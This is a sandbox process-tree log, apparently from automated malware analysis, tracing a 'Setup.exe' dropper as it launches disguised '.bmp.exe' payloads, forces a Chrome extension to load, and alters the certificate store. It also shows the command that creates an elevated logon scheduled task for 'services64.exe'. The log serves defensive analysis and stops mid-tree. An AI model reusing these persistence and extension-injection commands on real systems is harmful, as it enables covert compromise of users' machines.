C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Checks computer location settings
- Drops Chrome extension
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabcd24f50,0x7ffabcd24f60,0x7ffabcd24f70
3⤵
PID:2464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:2
3⤵
PID:1152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2016 /prefetch:8
3⤵
PID:4200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2288 /prefetch:8
3⤵
PID:4844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2972 /prefetch:1
3⤵
PID:3340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:1
3⤵
PID:1472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
3⤵
PID:1768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4384 /prefetch:8
3⤵
PID:1656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8
3⤵
PID:4344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
3⤵
PID:4164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4844 /prefetch:8
3⤵
PID:3512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4736 /prefetch:8
3⤵
PID:2304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:8
3⤵
PID:2968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:8
3⤵
PID:5008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4756 /prefetch:8
3⤵
PID:3448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,13569963039023665068,17567052467272136635,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4720 /prefetch:8
3⤵
PID:4984

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4872

C:\Users\Admin\Pictures\Adobe Films\Service.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Service.bmp.exe"
2⤵
- Executes dropped EXE
PID:3444

C:\Users\Admin\Documents\vuRKzJ96a7dPn6KvTQ_hsuLI.exe
"C:\Users\Admin\Documents\vuRKzJ96a7dPn6KvTQ_hsuLI.exe"
3⤵
PID:3344

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
4⤵
PID:2448

C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe"
4⤵
PID:452

C:\Windows\SysWOW64\ftp.exe
ftp -?
5⤵
PID:4992

C:\Users\Admin\Pictures\Adobe Films\mixinte2001.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\mixinte2001.bmp.exe"
4⤵
PID:3636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 256
5⤵
- Program crash
PID:6324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 700
5⤵
- Program crash
PID:6496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 708
5⤵
- Program crash
PID:6544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 824
5⤵
- Program crash
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 832
5⤵
- Program crash
PID:5328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 956
5⤵
- Program crash
PID:3376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1012
5⤵
- Program crash
PID:1848

C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe"
4⤵
PID:4880

C:\Users\Admin\Pictures\Adobe Films\download2.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\download2.exe.exe"
4⤵
PID:1792

C:\Users\Admin\AppData\Local\Temp\InvisBrowser45856.exe
"C:\Users\Admin\AppData\Local\Temp\InvisBrowser45856.exe"
5⤵
PID:4440

C:\Users\Admin\AppData\Local\Temp\setup331.exe
"C:\Users\Admin\AppData\Local\Temp\setup331.exe"
5⤵
PID:3504

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /Y .\PJXQ7~S3.G59
6⤵
PID:3908

C:\Users\Admin\AppData\Local\Temp\xlchen.exe
"C:\Users\Admin\AppData\Local\Temp\xlchen.exe"
5⤵
PID:552

C:\Users\Admin\AppData\Local\Temp\xlchen.exe
"C:\Users\Admin\AppData\Local\Temp\xlchen.exe" -h
6⤵
PID:5420

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
5⤵
PID:5244

C:\Users\Admin\AppData\Local\Temp\is-CNM0D.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CNM0D.tmp\setup.tmp" /SL5="$3024E,921114,831488,C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
PID:5684

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /VERYSILENT
7⤵
PID:6540

C:\Users\Admin\AppData\Local\Temp\is-18O1H.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-18O1H.tmp\setup.tmp" /SL5="$4024E,921114,831488,C:\Users\Admin\AppData\Local\Temp\setup.exe" /VERYSILENT
8⤵
PID:7040

C:\Windows\SysWOW64\explorer.exe
explorer.exe 101
9⤵
PID:3372

C:\Users\Admin\AppData\Local\Temp\rtst1077.exe
"C:\Users\Admin\AppData\Local\Temp\rtst1077.exe"
5⤵
PID:5464

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5464 -s 268
6⤵
- Program crash
PID:5636

C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
5⤵
PID:5672

C:\Users\Admin\AppData\Local\Temp\pregmatch-1.exe
"C:\Users\Admin\AppData\Local\Temp\pregmatch-1.exe"
5⤵
PID:5776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Roaming\tvemufzleocx"
6⤵
PID:3608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabcd24f50,0x7ffabcd24f60,0x7ffabcd24f70
7⤵
- Executes dropped EXE
PID:3560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1660 /prefetch:2
7⤵
PID:4920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1920 /prefetch:8
7⤵
PID:220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1
7⤵
PID:4332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
7⤵
PID:1844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4640 /prefetch:8
7⤵
PID:4200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2632 /prefetch:1
7⤵
PID:5888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2620 /prefetch:1
7⤵
PID:5864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 /prefetch:8
7⤵
PID:1020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 /prefetch:8
7⤵
PID:3068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5332 /prefetch:8
7⤵
PID:7164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5740 /prefetch:8
7⤵
PID:5028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5372 /prefetch:8
7⤵
PID:6688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:8
7⤵
PID:4564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=836 /prefetch:8
7⤵
PID:6836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:8
7⤵
PID:6868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2328 /prefetch:1
7⤵
PID:5212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2356 /prefetch:1
7⤵
PID:3536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:1
7⤵
PID:6636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,7050988649511529056,17156607837144428123,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5808 /prefetch:2
7⤵
PID:6872

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
5⤵
PID:5840

C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
6⤵
PID:6560

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--uOyLnaD1"
7⤵
PID:7080

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffabe16dec0,0x7ffabe16ded0,0x7ffabe16dee0
8⤵
PID:6920

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff73a069e70,0x7ff73a069e80,0x7ff73a069e90
9⤵
PID:4912

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1948,12762958505773792152,3309442783386135282,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7080_1382919059" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2132 /prefetch:1
8⤵
PID:5176

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1948,12762958505773792152,3309442783386135282,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7080_1382919059" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --mojo-platform-channel-handle=2140 /prefetch:1
8⤵
PID:6512

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,12762958505773792152,3309442783386135282,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7080_1382919059" --mojo-platform-channel-handle=2056 /prefetch:8
8⤵
PID:5792

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,12762958505773792152,3309442783386135282,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7080_1382919059" --mojo-platform-channel-handle=2040 /prefetch:8
8⤵
PID:7100

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1948,12762958505773792152,3309442783386135282,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7080_1382919059" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1992 /prefetch:2
8⤵
PID:2208

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1948,12762958505773792152,3309442783386135282,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7080_1382919059" --mojo-platform-channel-handle=3180 /prefetch:8
8⤵
PID:5420

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1948,12762958505773792152,3309442783386135282,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7080_1382919059" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3360 /prefetch:2
8⤵
PID:6340

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1948,12762958505773792152,3309442783386135282,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7080_1382919059" --mojo-platform-channel-handle=3684 /prefetch:8
8⤵
PID:2484

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1948,12762958505773792152,3309442783386135282,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7080_1382919059" --mojo-platform-channel-handle=3568 /prefetch:8
8⤵
PID:3464

C:\Users\Admin\AppData\Local\Temp\anytime 6.exe
"C:\Users\Admin\AppData\Local\Temp\anytime 6.exe"
5⤵
PID:5944

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:2124

C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
7⤵
PID:692

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
8⤵
PID:7088

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:5112

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
- Creates scheduled task(s)
PID:4516

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:5220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1272
7⤵
- Program crash
PID:5772

C:\Users\Admin\AppData\Local\Temp\anytime 7.exe
"C:\Users\Admin\AppData\Local\Temp\anytime 7.exe"
5⤵
PID:6028

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
- Executes dropped EXE
PID:1540

C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
7⤵
PID:5176

C:\Windows\System32\conhost.exe
